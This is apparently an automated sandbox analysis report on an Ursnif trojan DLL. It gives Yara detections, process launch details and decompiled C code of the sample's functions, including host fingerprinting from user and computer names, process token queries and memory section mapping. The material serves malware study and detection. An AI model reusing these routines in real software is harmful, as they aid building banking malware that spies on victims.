                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000010.00000003.314318653.0000000006878000.00000004.00000040.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000010.00000003.313929901.0000000006878000.00000004.00000040.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000010.00000003.314563024.0000000006878000.00000004.00000040.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000010.00000003.314146839.0000000006878000.00000004.00000040.sdmp, Author: Joe Security

                                        General

                                        Start time:11:33:44
                                        Start date:10/09/2021
                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                        Wow64 process (32bit):true
                                        Commandline:rundll32.exe C:\Users\user\Desktop\MGrYFpGLQ7.dll,Dithery
                                        Imagebase:0xba0000
                                        File size:61952 bytes
                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000012.00000002.346412042.0000000006C48000.00000004.00000040.sdmp, Author: Joe Security

                                        General

                                        Start time:11:33:48
                                        Start date:10/09/2021
                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                        Wow64 process (32bit):true
                                        Commandline:rundll32.exe C:\Users\user\Desktop\MGrYFpGLQ7.dll,Anhimae
                                        Imagebase:0xba0000
                                        File size:61952 bytes
                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000015.00000003.355232631.0000000007528000.00000004.00000040.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000015.00000003.355592572.0000000007528000.00000004.00000040.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000015.00000003.355040596.0000000007528000.00000004.00000040.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000015.00000003.355268021.0000000007528000.00000004.00000040.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000015.00000003.355464241.0000000007528000.00000004.00000040.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000015.00000003.355144752.0000000007528000.00000004.00000040.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000015.00000003.354973566.0000000007528000.00000004.00000040.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000015.00000003.355518422.0000000007528000.00000004.00000040.sdmp, Author: Joe Security

                                        General

                                        Start time:11:33:50
                                        Start date:10/09/2021
                                        Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4728 CREDAT:82976 /prefetch:2
                                        Imagebase:0xe90000
                                        File size:822536 bytes
                                        MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        General

                                        Start time:11:33:52
                                        Start date:10/09/2021
                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                        Wow64 process (32bit):true
                                        Commandline:rundll32.exe C:\Users\user\Desktop\MGrYFpGLQ7.dll,Anostraca
                                        Imagebase:0xba0000
                                        File size:61952 bytes
                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001B.00000002.361195316.00000000074A8000.00000004.00000040.sdmp, Author: Joe Security

                                        Disassembly

                                        Code Analysis

                                          Executed Functions

                                          C-Code - Quality: 93%
                                          			E00C732BA(signed char* __eax, intOrPtr* _a4) {
                                          				signed int _v12;
                                          				void* _v16;
                                          				CHAR* _v20;
                                          				struct _FILETIME _v28;
                                          				void* _v32;
                                          				void* _v36;
                                          				char* _v40;
                                          				signed int _v44;
                                          				long _v344;
                                          				struct _WIN32_FIND_DATAA _v368;
                                          				signed int _t72;
                                          				void* _t74;
                                          				signed int _t76;
                                          				void* _t78;
                                          				intOrPtr _t81;
                                          				CHAR* _t83;
                                          				void* _t85;
                                          				signed char _t89;
                                          				signed char _t91;
                                          				intOrPtr _t93;
                                          				void* _t96;
                                          				long _t99;
                                          				int _t101;
                                          				signed int _t109;
                                          				char* _t111;
                                          				void* _t113;
                                          				int _t119;
                                          				char _t128;
                                          				void* _t134;
                                          				signed int _t136;
                                          				char* _t139;
                                          				signed int _t140;
                                          				char* _t141;
                                          				char* _t146;
                                          				signed char* _t148;
                                          				int _t151;
                                          				void* _t152;
                                          				void* _t153;
                                          				void* _t154;
                                          				void* _t165;
                                          
                                          				_v12 = _v12 & 0x00000000;
                                          				_t148 = __eax;
                                          				_t72 =  *0xc7d2a0; // 0x59935a40
                                          				_t74 = RtlAllocateHeap( *0xc7d238, 0, _t72 ^ 0x59935b44);
                                          				_v20 = _t74;
                                          				if(_t74 == 0) {
                                          					L36:
                                          					return _v12;
                                          				}
                                          				_t76 =  *0xc7d2a0; // 0x59935a40
                                          				_t78 = RtlAllocateHeap( *0xc7d238, 0, _t76 ^ 0x59935a4d);
                                          				_t146 = 0;
                                          				_v36 = _t78;
                                          				if(_t78 == 0) {
                                          					L35:
                                          					HeapFree( *0xc7d238, _t146, _v20);
                                          					goto L36;
                                          				}
                                          				_t136 =  *0xc7d2a0; // 0x59935a40
                                          				memset(_t78, 0, _t136 ^ 0x59935a4d);
                                          				_t81 =  *0xc7d2a4; // 0x24ba5a8
                                          				_t154 = _t153 + 0xc;
                                          				_t5 = _t81 + 0xc7e7e8; // 0x73797325
                                          				_t83 = E00C777E6(_t5);
                                          				_v20 = _t83;
                                          				if(_t83 == 0) {
                                          					L34:
                                          					HeapFree( *0xc7d238, _t146, _v36);
                                          					goto L35;
                                          				}
                                          				_t134 = 0xffffffffffffffff;
                                          				_v28.dwLowDateTime = 0x59935a4d;
                                          				_v28.dwHighDateTime = 0x59935a4d;
                                          				_t85 = CreateFileA(_t83, 0x80000000, 1, 0, 3, 0x80, 0); // executed
                                          				_v32 = _t85;
                                          				if(_t85 != 0x59935a4d) {
                                          					GetFileTime(_t85,  &_v28, 0, 0);
                                          					_v28.dwLowDateTime = _v28.dwLowDateTime + 0x2a69c000;
                                          					asm("adc dword [ebp-0x14], 0xc9"); // executed
                                          					FindCloseChangeNotification(_v32); // executed
                                          				}
                                          				 *(StrRChrA(_v20, _t146, 0x5c)) = 0;
                                          				_t89 = 0x3c6ef35f +  *_t148 * 0x19660d;
                                          				_t91 = 0x3c6ef35f + _t89 * 0x19660d;
                                          				 *_t148 = _t91;
                                          				_v32 = _t91 & 0x000000ff;
                                          				_t93 =  *0xc7d2a4; // 0x24ba5a8
                                          				_t16 = _t93 + 0xc7e809; // 0x642e2a5c
                                          				_v40 = _t146;
                                          				_v44 = _t89 & 0x000000ff;
                                          				__imp__(_v20, _t16);
                                          				_t96 = FindFirstFileA(_v20,  &_v368); // executed
                                          				_v16 = _t96;
                                          				if(_t96 == _t134) {
                                          					_t146 = 0;
                                          					goto L34;
                                          				}
                                          				_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
                                          				while(_t99 > 0) {
                                          					_t101 = FindNextFileA(_v16,  &_v368); // executed
                                          					if(_t101 == 0) {
                                          						FindClose(_v16);
                                          						_v16 = FindFirstFileA(_v20,  &_v368);
                                          						_v28.dwHighDateTime = _v344;
                                          						_v28.dwLowDateTime = _v368.ftLastWriteTime.dwLowDateTime;
                                          					}
                                          					_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
                                          				}
                                          				_v12 = _v12 & 0x00000000;
                                          				while(1) {
                                          					_t109 = _v44;
                                          					if(_v12 <= _t109) {
                                          						goto L15;
                                          					}
                                          					_t140 = _v12;
                                          					if(_t140 > _v32) {
                                          						_t141 = _v36;
                                          						 *_a4 = _t141;
                                          						while(1) {
                                          							_t128 =  *_t141;
                                          							if(_t128 == 0) {
                                          								break;
                                          							}
                                          							if(_t128 < 0x30) {
                                          								 *_t141 = _t128 + 0x20;
                                          							}
                                          							_t141 = _t141 + 1;
                                          						}
                                          						_v12 = 1;
                                          						FindClose(_v16); // executed
                                          						_t146 = 0;
                                          						goto L35;
                                          					}
                                          					_t165 = _t140 - _t109;
                                          					L15:
                                          					if(_t165 == 0 || _v12 == _v32) {
                                          						_t111 = StrChrA( &(_v368.cFileName), 0x2e);
                                          						_t139 = _v40;
                                          						_t151 = _t111 -  &(_v368.cFileName);
                                          						_t113 = 0;
                                          						if(_t139 != 0) {
                                          							_t48 = _t151 - 4; // -4
                                          							_t113 = _t48;
                                          							if(_t113 > _t151) {
                                          								_t113 = 0;
                                          							}
                                          						}
                                          						if(_t151 > 4) {
                                          							_t151 = 4;
                                          						}
                                          						memcpy(_v36 + _t139, _t152 + _t113 - 0x140, _t151);
                                          						_t154 = _t154 + 0xc;
                                          						_v40 =  &(_v40[_t151]);
                                          					}
                                          					do {
                                          						_t119 = FindNextFileA(_v16,  &_v368); // executed
                                          						if(_t119 == 0) {
                                          							FindClose(_v16);
                                          							_v16 = FindFirstFileA(_v20,  &_v368);
                                          						}
                                          					} while (CompareFileTime( &(_v368.ftLastWriteTime),  &_v28) > 0);
                                          					_v12 = _v12 + 1;
                                          				}
                                          			}

                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,59935A40,00000000), ref: 00C732E5
                                          • RtlAllocateHeap.NTDLL(00000000,59935A40), ref: 00C73307
                                          • memset.NTDLL ref: 00C73321
                                            • Part of subcall function 00C777E6: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,59935A4D,00C7333A,73797325), ref: 00C777F7
                                            • Part of subcall function 00C777E6: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 00C77811
                                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 00C7335F
                                          • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00C73373
                                          • FindCloseChangeNotification.KERNEL32(00000000), ref: 00C7338A
                                          • StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 00C73396
                                          • lstrcat.KERNEL32(?,642E2A5C), ref: 00C733D7
                                          • FindFirstFileA.KERNEL32(?,?), ref: 00C733ED
                                          • CompareFileTime.KERNEL32(?,?), ref: 00C7340B
                                          • FindNextFileA.KERNEL32(00C7207E,?), ref: 00C7341F
                                          • FindClose.KERNEL32(00C7207E), ref: 00C7342C
                                          • FindFirstFileA.KERNEL32(?,?), ref: 00C73438
                                          • CompareFileTime.KERNEL32(?,?), ref: 00C7345A
                                          • StrChrA.SHLWAPI(?,0000002E), ref: 00C7348D
                                          • memcpy.NTDLL(00000000,?,00000000), ref: 00C734C6
                                          • FindNextFileA.KERNELBASE(00C7207E,?), ref: 00C734DB
                                          • FindClose.KERNEL32(00C7207E), ref: 00C734E8
                                          • FindFirstFileA.KERNEL32(?,?), ref: 00C734F4
                                          • CompareFileTime.KERNEL32(?,?), ref: 00C73504
                                          • FindClose.KERNEL32(00C7207E), ref: 00C73539
                                          • HeapFree.KERNEL32(00000000,00000000,73797325), ref: 00C7354B
                                          • HeapFree.KERNEL32(00000000,?), ref: 00C7355B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: File$Find$CloseHeapTime$CompareFirst$AllocateEnvironmentExpandFreeNextStrings$ChangeCreateNotificationlstrcatmemcpymemset
                                          • String ID:
                                          • API String ID: 2944988578-0
                                          • Opcode ID: 3270a98ed65cc8487d060babcf41100986c90a4f7266a3490fbde5dc59e283a5
                                          • Instruction ID: 4ecc8ea7385ffdb0678811d7f5a03309b42548442f942fdbc94a92bf7cd2d3d2
                                          • Opcode Fuzzy Hash: 3270a98ed65cc8487d060babcf41100986c90a4f7266a3490fbde5dc59e283a5
                                          • Instruction Fuzzy Hash: B4812A71900159EFDB119FA5DC84BEEBBB9FF48300F10816AE519E6260D7319A85DBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          control_flow_graph 163 5f10fc-5f1153 GetSystemTimeAsFileTime _aulldiv _snwprintf 164 5f115a-5f1173 CreateFileMappingW 163->164 165 5f1155 163->165 166 5f11bd-5f11c3 GetLastError 164->166 167 5f1175-5f117e 164->167 165->164 168 5f11c5-5f11cb 166->168 169 5f118e-5f119c MapViewOfFile 167->169 170 5f1180-5f1187 GetLastError 167->170 172 5f119e-5f11aa 169->172 173 5f11ac-5f11b2 GetLastError 169->173 170->169 171 5f1189-5f118c 170->171 174 5f11b4-5f11bb CloseHandle 171->174 172->168 173->168 173->174 174->168
                                          C-Code - Quality: 69%
                                          			E005F10FC(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
                                          				intOrPtr _v12;
                                          				struct _FILETIME* _v16;
                                          				short _v60;
                                          				struct _FILETIME* _t14;
                                          				intOrPtr _t15;
                                          				long _t18;
                                          				void* _t19;
                                          				void* _t22;
                                          				intOrPtr _t31;
                                          				long _t32;
                                          				void* _t34;
                                          
                                          				_t31 = __edx;
                                          				_t14 =  &_v16;
                                          				GetSystemTimeAsFileTime(_t14);
                                          				_push(0x192);
                                          				_push(0x54d38000);
                                          				_push(_v12);
                                          				_push(_v16);
                                          				L005F2180();
                                          				_push(_t14);
                                          				_v16 = _t14;
                                          				_t15 =  *0x5f4144;
                                          				_push(_t15 + 0x5f505e);
                                          				_push(_t15 + 0x5f5054);
                                          				_push(0x16);
                                          				_push( &_v60);
                                          				_v12 = _t31;
                                          				L005F217A();
                                          				_t18 = _a4;
                                          				if(_t18 == 0) {
                                          					_t18 = 0x1000;
                                          				}
                                          				_t19 = CreateFileMappingW(0xffffffff, 0x5f4148, "true", 0, _t18,  &_v60); // executed
                                          				_t34 = _t19;
                                          				if(_t34 == 0) {
                                          					_t32 = GetLastError();
                                          				} else {
                                          					if(_a4 != 0 || GetLastError() == 0xb7) {
                                          						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
                                          						if(_t22 == 0) {
                                          							_t32 = GetLastError();
                                          							if(_t32 != 0) {
                                          								goto L9;
                                          							}
                                          						} else {
                                          							 *_a8 = _t34;
                                          							 *_a12 = _t22;
                                          							_t32 = 0;
                                          						}
                                          					} else {
                                          						_t32 = 2;
                                          						L9:
                                          						CloseHandle(_t34);
                                          					}
                                          				}
                                          				return _t32;
                                          			}















                                          APIs
                                          • GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,005F175D,0000000A,?,?), ref: 005F1109
                                          • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 005F111F
                                          • _snwprintf.NTDLL ref: 005F1144
                                          • CreateFileMappingW.KERNELBASE(000000FF,005F4148,00000004,00000000,?,?), ref: 005F1169
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,005F175D,0000000A,?), ref: 005F1180
                                          • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 005F1194
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,005F175D,0000000A,?), ref: 005F11AC
                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,005F175D,0000000A), ref: 005F11B5
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,005F175D,0000000A,?), ref: 005F11BD
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.519649525.00000000005F0000.00000040.00020000.sdmp, Offset: 005F0000, based on PE: true
                                          • Associated: 00000000.00000002.519749348.00000000005F5000.00000040.00020000.sdmp
                                          • Associated: 00000000.00000002.519817057.00000000005F7000.00000040.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5f0000_loaddll32.jbxd
                                          Similarity
                                          • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                          • String ID:
                                          • API String ID: 1724014008-0
                                          • Opcode ID: 56a7806e4443173107f7e1948a8115fb1d843934f1449540262610678156a44c
                                          • Instruction ID: e9f3b55dcb3dbf3bb8151758d161d34dc0108c4e2e69e9c59f669985be29f437
                                          • Opcode Fuzzy Hash: 56a7806e4443173107f7e1948a8115fb1d843934f1449540262610678156a44c
                                          • Instruction Fuzzy Hash: 5F216DB260060CFBD710AFA4DC88EBE3BADEB94350F104125F715D7190DA789949DB64
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          control_flow_graph 184 c793d5-c793e9 185 c793f3-c79405 call c76f89 184->185 186 c793eb-c793f0 184->186 189 c79407-c79417 GetUserNameW 185->189 190 c79459-c79466 185->190 186->185 191 c79468-c7947f GetComputerNameW 189->191 192 c79419-c79429 RtlAllocateHeap 189->192 190->191 193 c79481-c79492 RtlAllocateHeap 191->193 194 c794bd-c794e1 191->194 192->191 195 c7942b-c79438 GetUserNameW 192->195 193->194 196 c79494-c7949d GetComputerNameW 193->196 197 c7943a-c79446 call c77cf7 195->197 198 c79448-c79457 HeapFree 195->198 199 c7949f-c794ab call c77cf7 196->199 200 c794ae-c794b7 HeapFree 196->200 197->198 198->191 199->200 200->194
                                          C-Code - Quality: 96%
                                          			E00C793D5(char __eax, void* __esi) {
                                          				long _v8;
                                          				char _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				signed int _v28;
                                          				long _t34;
                                          				signed int _t39;
                                          				long _t50;
                                          				char _t59;
                                          				intOrPtr _t61;
                                          				void* _t62;
                                          				void* _t64;
                                          				char _t65;
                                          				intOrPtr* _t67;
                                          				void* _t68;
                                          				void* _t69;
                                          
                                          				_t69 = __esi;
                                          				_t65 = __eax;
                                          				_v8 = 0;
                                          				_v12 = __eax;
                                          				if(__eax == 0) {
                                          					_t59 =  *0xc7d270; // 0xd448b889
                                          					_v12 = _t59;
                                          				}
                                          				_t64 = _t69;
                                          				E00C76F89( &_v12, _t64);
                                          				if(_t65 != 0) {
                                          					 *_t69 =  *_t69 ^  *0xc7d2a0 ^ 0x76f6612d;
                                          				} else {
                                          					GetUserNameW(0,  &_v8); // executed
                                          					_t50 = _v8;
                                          					if(_t50 != 0) {
                                          						_t62 = RtlAllocateHeap( *0xc7d238, 0, _t50 + _t50);
                                          						if(_t62 != 0) {
                                          							if(GetUserNameW(_t62,  &_v8) != 0) {
                                          								_t64 = _t62;
                                          								 *_t69 =  *_t69 ^ E00C77CF7(_v8 + _v8, _t64);
                                          							}
                                          							HeapFree( *0xc7d238, 0, _t62);
                                          						}
                                          					}
                                          				}
                                          				_t61 = __imp__;
                                          				_v8 = _v8 & 0x00000000;
                                          				GetComputerNameW(0,  &_v8);
                                          				_t34 = _v8;
                                          				if(_t34 != 0) {
                                          					_t68 = RtlAllocateHeap( *0xc7d238, 0, _t34 + _t34);
                                          					if(_t68 != 0) {
                                          						if(GetComputerNameW(_t68,  &_v8) != 0) {
                                          							_t64 = _t68;
                                          							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E00C77CF7(_v8 + _v8, _t64);
                                          						}
                                          						HeapFree( *0xc7d238, 0, _t68);
                                          					}
                                          				}
                                          				asm("cpuid");
                                          				_t67 =  &_v28;
                                          				 *_t67 = 1;
                                          				 *((intOrPtr*)(_t67 + 4)) = _t61;
                                          				 *((intOrPtr*)(_t67 + 8)) = 0;
                                          				 *(_t67 + 0xc) = _t64;
                                          				_t39 = _v16 ^ _v20 ^ _v28;
                                          				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
                                          				return _t39;
                                          			}




















                                          APIs
                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 00C7940C
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 00C79423
                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 00C79430
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 00C79451
                                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 00C79478
                                          • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00C7948C
                                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 00C79499
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 00C794B7
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: HeapName$AllocateComputerFreeUser
                                          • String ID:
                                          • API String ID: 3239747167-0
                                          • Opcode ID: 12e3b1565a5b51c275ead4dcd2eb882869c4a0d1c4c59e91715dca4d78ae5bb3
                                          • Instruction ID: 0836de0ccd28b258fe6198adc0116ef15fe7c8f6dcdd966aa18ad78682f82b2b
                                          • Opcode Fuzzy Hash: 12e3b1565a5b51c275ead4dcd2eb882869c4a0d1c4c59e91715dca4d78ae5bb3
                                          • Instruction Fuzzy Hash: 3A31E9B1A00209EFDB11DFA9DD81B6EB7F9FF48300F518569E519D6221DB30EE429B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%


                                          C-Code - Quality: 38%
                                          			E00C771B9(char _a4, void* _a8) {
                                          				void* _v8;
                                          				void* _v12;
                                          				char _v16;
                                          				void* _v20;
                                          				char _v24;
                                          				char _v28;
                                          				char _v32;
                                          				char _v36;
                                          				char _v40;
                                          				void* _v44;
                                          				void** _t33;
                                          				void* _t40;
                                          				void* _t43;
                                          				void** _t44;
                                          				intOrPtr* _t47;
                                          				char _t48;
                                          
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				_v20 = _a4;
                                          				_t48 = 0;
                                          				_v16 = 0;
                                          				_a4 = 0;
                                          				_v44 = 0x18;
                                          				_v40 = 0;
                                          				_v32 = 0;
                                          				_v36 = 0;
                                          				_v28 = 0;
                                          				_v24 = 0;
                                          				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
                                          					_t33 =  &_v8;
                                          					__imp__(_v12, 8, _t33);
                                          					if(_t33 >= 0) {
                                          						_t47 = __imp__;
                                          						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
                                          						_t44 = E00C758BE(_a4);
                                          						if(_t44 != 0) {
                                          							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
                                          							if(_t40 >= 0) {
                                          								memcpy(_a8,  *_t44, 0x1c);
                                          								_t48 = 1;
                                          							}
                                          							E00C7147E(_t44);
                                          						}
                                          						NtClose(_v8); // executed
                                          					}
                                          					NtClose(_v12);
                                          				}
                                          				return _t48;
                                          			}




















                                          APIs
                                          • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 00C77200
                                          • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 00C77213
                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 00C7722F
                                            • Part of subcall function 00C758BE: RtlAllocateHeap.NTDLL(00000000,-00000008,00C71C51), ref: 00C758CA
                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 00C7724C
                                          • memcpy.NTDLL(?,00000000,0000001C), ref: 00C77259
                                          • NtClose.NTDLL(?), ref: 00C7726B
                                          • NtClose.NTDLL(00000000), ref: 00C77275
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                          • String ID:
                                          • API String ID: 2575439697-0
                                          • Opcode ID: 01e5353ea33ab9eab775d1191bb961b71f2b92263cb8fa8c2b9a242d42790f89
                                          • Instruction ID: 4acf420c098af1cd1a33bbfe06236cfc150a7fdbbea2c7e0ea91b528da0d1af7
                                          • Opcode Fuzzy Hash: 01e5353ea33ab9eab775d1191bb961b71f2b92263cb8fa8c2b9a242d42790f89
                                          • Instruction Fuzzy Hash: E721E97190011DFBDB019FA5CC85ADEBFBDEF18740F108126F908E6161D7719A84EBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 72%
                                          			E005F1A34(intOrPtr* __eax, void** _a4) {
                                          				int _v12;
                                          				void* _v16;
                                          				void* _v20;
                                          				void* _v24;
                                          				int _v28;
                                          				int _v32;
                                          				intOrPtr _v36;
                                          				int _v40;
                                          				int _v44;
                                          				void* _v48;
                                          				void* __esi;
                                          				long _t34;
                                          				void* _t39;
                                          				void* _t47;
                                          				intOrPtr* _t48;
                                          
                                          				_t48 = __eax;
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				_v24 =  *((intOrPtr*)(__eax + 4));
                                          				_v16 = 0;
                                          				_v12 = 0;
                                          				_v48 = 0x18;
                                          				_v44 = 0;
                                          				_v36 = 0x40;
                                          				_v40 = 0;
                                          				_v32 = 0;
                                          				_v28 = 0;
                                          				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
                                          				if(_t34 < 0) {
                                          					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
                                          				} else {
                                          					 *_t48 = _v16;
                                          					_t39 = E005F10BA(_t48,  &_v12); // executed
                                          					_t47 = _t39;
                                          					if(_t47 != 0) {
                                          						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
                                          					} else {
                                          						memset(_v12, 0, _v24);
                                          						 *_a4 = _v12;
                                          					}
                                          				}
                                          				return _t47;
                                          			}

                                          APIs
                                          • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,75144EE0,00000000,00000000,?), ref: 005F1A91
                                            • Part of subcall function 005F10BA: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,005F1AA6,00000002,00000000,?,?,00000000,?,?,005F1AA6,00000002), ref: 005F10E7
                                          • memset.NTDLL ref: 005F1AB3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.519649525.00000000005F0000.00000040.00020000.sdmp, Offset: 005F0000, based on PE: true
                                          • Associated: 00000000.00000002.519749348.00000000005F5000.00000040.00020000.sdmp
                                          • Associated: 00000000.00000002.519817057.00000000005F7000.00000040.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5f0000_loaddll32.jbxd
                                          Similarity
                                          • API ID: Section$CreateViewmemset
                                          • String ID: @
                                          • API String ID: 2533685722-2766056989
                                          • Opcode ID: aaaf58aa3bdd7b37c329ea1a53909f0b58be6d2e70c64ad720e0741f46616211
                                          • Instruction ID: feefcd2f678707e9865541da04b47fea168dd12dade7a50bf78870a7c3292b03
                                          • Opcode Fuzzy Hash: aaaf58aa3bdd7b37c329ea1a53909f0b58be6d2e70c64ad720e0741f46616211
                                          • Instruction Fuzzy Hash: 9E21E8B1D0060DEFCB11DFA9C8849EEFBB9FB48354F104429E655F3210D6359A448BA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 68%
                                          			E005F10BA(void** __esi, PVOID* _a4) {
                                          				long _v8;
                                          				void* _v12;
                                          				void* _v16;
                                          				long _t13;
                                          
                                          				_v16 = 0;
                                          				asm("stosd");
                                          				_v8 = 0;
                                          				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
                                          				if(_t13 < 0) {
                                          					_push(_t13);
                                          					return __esi[6]();
                                          				}
                                          				return 0;
                                          			}

                                          APIs
